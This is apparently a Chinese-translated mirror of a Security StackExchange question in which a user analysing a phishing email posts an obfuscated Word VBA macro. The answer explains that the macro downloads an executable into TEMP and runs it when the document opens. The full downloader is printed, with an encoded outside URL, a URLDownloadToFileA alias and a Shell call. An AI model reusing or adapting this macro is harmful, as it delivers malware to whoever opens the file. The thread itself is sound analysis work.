消除办公室VBA代码(恶意软件)
消除办公室VBA代码(恶意软件)
提问于 2016-11-19 08:44:05
我收到了一封恶意电子邮件,我正在试图找出恶意代码的作用。
我已设法通过解密Chr()值来找到有效负载,但其余代码是无法识别的:
'xsWChLNzlXVGlYZFbEhKDOzjNBrFZHSIl
'DpcvleMuqWiFyl
'hyaTdAKzoQinNr
#If VBA7 Then
Private Declare PtrSafe Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
Private Declare PtrSafe Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare PtrSafe Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal LGXqVWHEnKiVcwaykFTVOtoYnoTDLwWaNw As Long, ByVal KftlkyaxsIGlyvxXaRq As String, ByVal tEMWFoNKZputSPQzVOtoYnoTDLwWaNw As String, ByVal VOtoYnoTDLwWaNwelVYixgTcfwsAmLJelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJVOtoYnoTDLwWaNw As Long) As Long
Private Declare PtrSafe Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
Private Declare PtrSafe Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
#Else
Private Declare Function MuRvBqzFOoCHiUHOJKw Lib kernel32 Alias GetTickCount64 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function PAOKWMEkbYEoQQFQIb Lib kernel32 Alias FT_Exit24 (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function lIpXcxrTzTjpyvtA Lib kernel32 Alias GetProductName (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function JUNdgZxoTRSDKy Lib kernel32 Alias FindCloseChangeNotification (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function EQYZGelqKWNJRcce Lib kernel32 Alias PrivCopyFileExW (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbnelVYixgTcfwsAmLJ As Long) As Long
Private Declare Function iwjgRBIGLZpUNGoGTG Lib kernel32 Alias OfferVirtualMemory (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function VQBzUNhAGAtJOoF Lib urlmon Alias URLDownloadToFileA (ByVal eaNkjdOHzsdMqQQJj As Long, ByVal elVYixgTcfwsAmLJelVYixgTcfwsAmLJ As String, ByVal hyaTdAKzoQinNr As String, ByVal oclNInPDShbETYbnelVYixgTcfwsAmLJ As Long, ByVal MoJTLPWYmfKTgbzoclNInPDShbETYbn As Long) As Long
Private Declare Function GZwSeWZyIhNenjnZ Lib kernel32 Alias GetNumaNodeProcessorMask (ByVal lzYSEXffcfoThUb As Long, ByVal SqgFeQsbOnOMZMke As String, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJLMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnejelVYixgTcfwsAmLJ As Long, ByVal elVYixgTcfwsAmLJoclNInPDShbETYbn As Long) As Long
Private Declare Function elVYixgTcfwsAmLJ Lib kernel32 Alias WriteStateContainerValue (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function oclNInPDShbETYbn Lib kernel32 Alias CreateDirectoryExA (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal LMWHPWrDMfeVqPZuwgu As String, ByVal DBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZoclNInPDShbETYbn As Long) As Long
Private Declare Function MoJTLPWYmfKTgbz Lib kernel32 Alias GetConsoleHistoryInfo (ByVal lzYSEXffcfoThUbGZwSeWZyIhNenjnZ As Long, ByVal SqgFeQsbOnOMZMkeelVYixgTcfwsAmLJ As String, ByVal lzYSEXffcfoThUb As String, ByVal elVYixgTcfwsAmLJDBjnUFZaqAWuPymnej As Long, ByVal GZwSeWZyIhNenjnZelVYixgTcfwsAmLJ As Long) As Long
#End If
Function tyfevPUzZSHNUpjYGZwSeWZyIhNenjnZelVYixgTcfwsAmLJ(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
End If
End Function
Function hbnTqBUKPuGRJiqWZCx(ByVal AEbtrIvLZRPbVNfgVj As String, ByVal hUfrAbrdnkOdGp As String)
If PSUWksxjZPfDYLXwvxT = rMDsWrTugbpcOBHF Then
PYcyaTaPAZYqaEfo = ZPrnJJzqaCCtqvTbUx
'cbxeKGrLfUwXefANSyFxsWChLNzlXVGlYZZPrnJJzqaCCtqvTbUx
ZPrnJJzqaCCtqvTbUx = PSUWksxjZPfDYLXwvxT
End If
VQBzUNhAGAtJOoF 4 - 2 - 2 + 0 + 0, AEbtrIvLZRPbVNfgVj, hUfrAbrdnkOdGp, -4 + 4 + 100 - 100, 0 + 2 - 2
kulqYfDfxsawQDJKs = tyfevPUzZSHNUpjY
End Function
'Dim GwBumCCwetkuJxFBCpItkYuBQhYPrTgw as Boolean
Private Sub VOtoYnoTDLwWaNw()
iCQYbaBRKwhBnk = lhkiLXZpbeIyqeoYYT
kblSRXpqDJMxcL = DBjnUFZaqAWuPymnej(Chr(101) + Chr(120) + Chr(101) + Chr(46) + Chr(Asc(w)) + Chr(Asc(l)) + Chr(98) + Chr(100) + Chr(111) + Chr(Asc(c)) + Chr(47) + Chr(116) + Chr(97) + Chr(99) + Chr(46) + Chr(102) + Chr(109) + Chr(Asc(o)) + Chr(Asc(p)) + Chr(46) + Chr(Asc(a)) + Chr(Asc()) + Chr(Asc()) + Chr(Asc()) + Chr(115) + Chr(Asc(p)) + Chr(116) + Chr(116) + Chr(104))
If AEbtrIvLZRPbVN = ZDkwQiwTpwOOdeofW Then
SqgFeQsbOnOMZMke = dhwvEFcKDpsYsyJeZg
lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
End If
ZKsXGJZRFGCfXvXP = DBjnUFZaqAWuPymnej(ctsalal)
If vMtgBnwtQByVtExPHr = rSCIQrDtFvkdcUGB Then
iTWgFywkvRqSPai = ZUqEtJtyPvyDIJuP
End If
VJtYenETeqAVMuxRbDY = Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30) & ZKsXGJZRFGCfXvXP
If jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then
lzYSEXffcfoThUb = LMWHPWrDMfeVqPZuwgu
End If
hbnTqBUKPuGRJiqWZCx kblSRXpqDJMxcL, VJtYenETeqAVMuxRbDY 'if jAINgzIjHHlNyJLBCET = snhxHQABbdQMsDkgL Then
Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY As Currency
Call Shell(VJtYenETeqAVMuxRbDY, vbNormalFocus) ' Dim rSCIQrDtFvkdcUGBVJtYenETeqAVMuxRbDY as Integer
QVKciSoAuvfQxE = WIlNjMLmbBEiXU
End Sub
Sub Document_Open()
VOtoYnoTDLwWaNw 'kulqYfDfxsawQDJKstyfevPUzZSHNUpjY
End Sub
Private Function EoUkpEUNnhmSKLKUmtAYNRreSwhjqjV(ByVal FbEhKDOzjNBrFZHSIlEoUkpEUNnhmSKL As String)
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
If KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL Then
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
Dim FbEhKDOzjNBrFZHSIl As Currency
End If
End Function
Private Sub eIZAqeJRzrTIWdkoMI()
oFxRFuVhRCqIsfBH = MRVXJWcClZWEiZqHHU
End Sub
Private Function DBjnUFZaqAWuPymnej(lJWzsWzeaVgVJGa)
If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV
End If
DBjnUFZaqAWuPymnej = StrReverse(lJWzsWzeaVgVJGa)
If TSSWLPSPMemjroWC = KUmtAYNRreSwhjqjV Then
KUmtAYNRreSwhjqjV = EoUkpEUNnhmSKL
End If
End Function
Function GZwSeWZyIhNenjnZtyfevPUzZSHNUpjY(ByVal AEbtrIvLZRPbVNZDkwQiwTpwOOdeofW As Integer)
kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY
If kulqYfDfxsawQDJKsAEbtrIvLZRPbVN = tyfevPUzZSHNUpjY Then
'GZwSeWZyIhNenjnZoclNInPDShbETYbn=MoJTLPWYmfKTgbz
End If
End Function我可以用什么方法来解密/解码下面的代码,以便了解它的作用。
我已经尝试过oledump.py脚本找到了这里,但是没有结果。
突出显示的代码可以在这里看到:http://pastebin.com/YDqk3BbM
回答 1
Security用户
回答已采纳
发布于 2016-11-19 10:23:17
VQBzUNhAGAtJOoF是URLDownloadToFileA的别名
Environ$(Chr(22# + 22# + 22# + 8# + 10#) + Chr(100 - 100 + 4 + 3 + 50 + 20) + Chr(2 - 2 + 100 - 10 - 5 - 5)) + Chr(2 + 10 + 20 + 30 + 30)等于"TEMP\"
通常这些脚本都是相同的:它们从因特网下载一个可执行文件到临时文件夹并执行它(使用代码中的Shell语句)。
该可执行文件是实际的恶意代码。
页面原文内容由Security提供。腾讯云小微IT领域专用引擎提供翻译支持
原文链接:
https://security.stackexchange.com/questions/143025
复制相关文章
相似问题
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号